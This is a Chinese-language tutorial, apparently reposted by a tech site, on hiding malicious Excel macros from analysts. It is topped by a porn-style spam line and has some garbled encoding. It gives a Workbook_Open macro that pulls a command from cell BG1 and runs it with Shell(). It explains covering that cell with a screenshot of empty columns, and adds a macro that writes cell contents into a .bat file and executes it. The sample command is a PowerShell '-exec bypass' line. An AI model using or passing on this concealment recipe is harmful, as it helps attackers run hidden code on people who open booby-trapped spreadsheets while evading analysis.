自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何在Excel中更好地隱藏惡意宏代碼

安全
你可能會問,為什么不簡單地使用實際上不涉及工作簿的代碼,以及主要原因是避免網(wǎng)絡(luò)流量。

 你可能會問,為什么不簡單地使用實際上不涉及工作簿的代碼,以及主要原因是避免網(wǎng)絡(luò)流量。當(dāng)然,你可以簡單地添加宏,這些宏會將每行代碼添加到一個新文件中,以避免網(wǎng)絡(luò)流量,但是這樣做會使活動對于任何分析文檔的人來說都是顯而易見的,他們會在查看時立即看到新的代碼行宏。使用這種方法,它使得對惡意文檔的分析稍微困難一些,但是當(dāng)然不是很多。

[[344792]]

注意:僅對文檔運行oledump或olevba之類的工具將返回宏。

此時你會看到,該宏正在從特定列中提取代碼并使用Shell()執(zhí)行該代碼,但該代碼顯然非??梢桑?/p>

而且,如果我們導(dǎo)航到代碼所在的BG1,我們不會立即看到任何可疑的東西:但是,如果將鼠標(biāo)懸停在BG1上(或者稍微靠近一下并注意到未對齊的列),那么你會看到在代碼上覆蓋了一個圖像:

顯然,更有耐心的人可以完善空列的屏幕截圖,并將其覆蓋在代碼頂部以使其不那么引人注意。揭示從工作表中提取的代碼的另一種方法是使用MsgBox:

1. 一組要覆蓋在代碼頂部的空列的屏幕截圖,例如:

2. 從工作簿中提取代碼并運行數(shù)據(jù)的宏:

 

  1. Private Sub Workbook_Open() 
  2. Data = Sheet1.Range("BG1"
  3. Shell(Data) 
  4. End Sub 

 

Data = Sheet1.Range("BG1")僅查看位于BG1的行,提取該行中的所有內(nèi)容并將其放在變量Data中。

3. 打開文檔并在用戶單擊“啟用內(nèi)容”后將提取并執(zhí)行的代碼。

 

  1. powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt 

將代碼插入所需的任何列后,只需將空列的圖像插入代碼上方(插入>插圖>圖片)。

然后將宏插入ThisWorkbook并更改Range()部分以與你的列匹配。因此,如果你將數(shù)據(jù)插入A列并且位于第一行,它就是Range("A1")。

將多行寫入文件

向文件寫入多行只是小菜一碟,只需要添加幾行代碼即可。

使用的宏代碼如下所示:

 

  1. Private Sub Workbook_Open() 
  2. 1. Dim Path As String 
  3. 2. Dim FileNumber As Integer 
  4. 3. FileNumber = FreeFile 
  5. 4. Data = Sheet1.Range("BG1"
  6. 5. Data2 = Sheet1.Range("BG2"
  7. 6. Path = "test.bat" 
  8. 7. Open Path For Output As FileNumber 
  9. 8.    Print #FileNumber, Data 
  10. 9.    Print #FileNumber, Data2 
  11. 10.    Close FileNumber 
  12. 11. Shell(Path) 
  13. End Sub 

 

第1-3行是靜態(tài)的,保持原樣,它們只是定義使用的變量。第4-6行是動態(tài)的。你將需要根據(jù)excel工作表將4和5中的字符串更改為代碼所在的位置。將第6行更改為所需的文件路徑。

第7-9行也是動態(tài)的,它們僅打開文件并將已提取的數(shù)據(jù)寫入文件。特別是第8和9行是負(fù)責(zé)將數(shù)據(jù)寫入文件的行。

只需將要寫入文件的代碼插入到工作簿中,并記下該文件所在的列和行,并更改Data&Data1變量以與你的列和行匹配(如果需要的話,添加更多的變量)。然后,將工作簿中的代碼與空行的屏幕截圖疊加,然后開始就可以了!

責(zé)任編輯:華軒 來源: 嘶吼網(wǎng)
相關(guān)推薦

2018-10-11 09:40:53

前端JavaScript編程語言

2022-09-12 23:53:53

JavaScript條件判斷開發(fā)

2021-05-23 15:46:23

React代碼前端

2019-03-22 14:20:26

管理多云云計算

2023-05-04 07:11:29

2020-05-15 10:46:11

云成本私有云混合云

2015-11-18 09:56:24

數(shù)據(jù)中心監(jiān)控

2019-01-07 10:24:41

2023-01-09 08:39:38

因果推斷機(jī)器學(xué)習(xí)

2009-12-04 10:28:48

VS宏代碼

2016-05-16 09:56:01

2017-10-12 15:20:57

數(shù)據(jù)中心遷移數(shù)據(jù)云端

2020-07-08 08:22:08

FlutterSVGPNG

2021-02-25 22:17:19

開發(fā)技術(shù)編程

2009-11-07 22:03:59

2011-03-16 14:29:51

2022-07-17 15:53:09

云計算多云云管理

2018-06-26 15:06:37

2023-11-09 11:48:41

2012-12-20 09:46:42

應(yīng)用虛擬化
點贊
收藏

51CTO技術(shù)棧公眾號